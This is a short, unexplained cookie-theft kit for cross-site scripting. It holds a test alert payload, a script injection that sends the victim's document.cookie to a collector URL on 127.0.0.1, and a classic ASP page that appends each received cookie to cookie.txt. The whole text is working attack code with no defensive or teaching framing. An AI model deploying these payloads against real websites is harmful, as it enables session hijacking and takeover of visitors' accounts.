<script>alert('xss test');</script>


<script>document.location='http://127.0.0.1/1.asp?msg='+document.cookie</script>


<%
thisfile=Server.MapPath("cookie.txt")
msg=Request("msg")
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.OpenTextFile(thisfile,8,True,0)
thisfile.WriteLine("=======cookie:"&msg&"======by xxx")
thisfile.close
set fs=nothing
%>